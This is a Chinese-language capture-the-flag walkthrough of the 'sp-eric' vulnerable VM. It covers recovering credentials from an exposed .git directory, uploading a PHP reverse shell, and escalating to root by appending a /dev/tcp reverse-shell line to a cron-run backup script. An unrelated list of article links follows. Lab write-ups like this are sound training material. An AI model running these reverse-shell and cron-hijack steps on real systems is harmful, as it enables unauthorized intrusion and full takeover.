当前位置: 首页 > news >正文

sp-eric靶机

news 来源:原创 2024/9/20 9:54:30

端口扫描

靶机ip地址为192.168.7.46

目录扫描

访问80端口

拼接访问 /admin.php

发现登录框

测试sql注入,弱口令等,无结果

扫描目录发现了.git文件,存在源码泄漏

将其下载到kali上读取

python2 GitHack.py -u http://192.168.7.180/.git/

发现账号密码

admin:st@mpch0rdt.ightiRu$glo0mappL3

登录成功

存在文件上传功能,kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

将ip改为kali的ip 设置端口

上传文件

开启监听

访问 /upload/php-reverse-shell.php

成功反弹shell

获得交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看系统配置文件

在 /home/eric 下发现文件

查看内容

/etc/crontab 存在计划任务

可以写入反弹shell语句

echo 'bash -i >& /dev/tcp/192.168.7.100/9999 0>&1' >> backup.sh

kali监听

反弹成功

提权成功

在 /root 下发现flag文件

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 【区块链+金融服务】农业大宗供应链线上融资平台 | FISCO BCOS应用案例
  • PDF转换器推荐:轻松将图片批量转为PDF
  • 系列:水果甜度个人手持设备检测-- 行业现状小结
  • Spring @Transactional事务传播行为详解
  • Datawhale AI 夏令营第四期 大模型技术-微调 task3 数据增强与评分
  • 汽车4S店管理系统-计算机毕设Java|springboot实战项目
  • 【Linux基础】对Linux权限的理解与管理
  • 解决方案上新了丨趋动科技推出基于银河麒麟操作系统的异构算力池化解决方案
  • 统一响应结果封装,Result类的实现【后端 06】
  • 鸿蒙开发APP应用UX体验标准
  • 【应用】 Flask 和 WebSockets 开发实时聊天应用程序
  • 【论文笔记】:YOLOv8-QSD 自动驾驶场景小目标检测算法
  • skywalking架构
  • Qt QPushButton::clicked和QPushButton::click的区别
  • 平安城市/雪亮工程现状及需求分析:EasyCVR视频汇聚平台助力雪亮工程项目建设
  • [rust! #004] [译] Rust 的内置 Traits, 使用场景, 方式, 和原因
  • Apache Spark Streaming 使用实例
  • codis proxy处理流程
  • FastReport在线报表设计器工作原理
  • Flex布局到底解决了什么问题
  • java架构面试锦集:开源框架+并发+数据结构+大企必备面试题
  • Python 基础起步 (十) 什么叫函数?
  • Quartz实现数据同步 | 从0开始构建SpringCloud微服务(3)
  • React-flux杂记
  • 欢迎参加第二届中国游戏开发者大会
  • 简单易用的leetcode开发测试工具(npm)
  • 前端学习笔记之原型——一张图说明`prototype`和`__proto__`的区别
  • 浅谈JavaScript的面向对象和它的封装、继承、多态
  • 容器化应用: 在阿里云搭建多节点 Openshift 集群
  • 提升用户体验的利器——使用Vue-Occupy实现占位效果
  • 提醒我喝水chrome插件开发指南
  • 最简单的无缝轮播
  • 看到一个关于网页设计的文章分享过来!大家看看!
  • Linux权限管理(week1_day5)--技术流ken
  • 宾利慕尚创始人典藏版国内首秀,2025年前实现全系车型电动化 | 2019上海车展 ...
  • 继 XDL 之后,阿里妈妈开源大规模分布式图表征学习框架 Euler ...
  • ​Spring Boot 分片上传文件
  • #微信小程序:微信小程序常见的配置传旨
  • ()、[]、{}、(())、[[]]等各种括号的使用
  • (¥1011)-(一千零一拾一元整)输出
  • (C语言)输入一个序列,判断是否为奇偶交叉数
  • (ibm)Java 语言的 XPath API
  • (动手学习深度学习)第13章 计算机视觉---微调
  • (附源码)php新闻发布平台 毕业设计 141646
  • (蓝桥杯每日一题)平方末尾及补充(常用的字符串函数功能)
  • (十八)devops持续集成开发——使用docker安装部署jenkins流水线服务
  • (一)Dubbo快速入门、介绍、使用
  • (一一四)第九章编程练习
  • (转)EXC_BREAKPOINT僵尸错误
  • .Net Core 微服务之Consul(三)-KV存储分布式锁
  • .net dataexcel winform控件 更新 日志
  • .NET delegate 委托 、 Event 事件
  • .NET Framework 3.5安装教程
  • .NET Framework杂记
  • .NET MAUI Sqlite数据库操作(二)异步初始化方法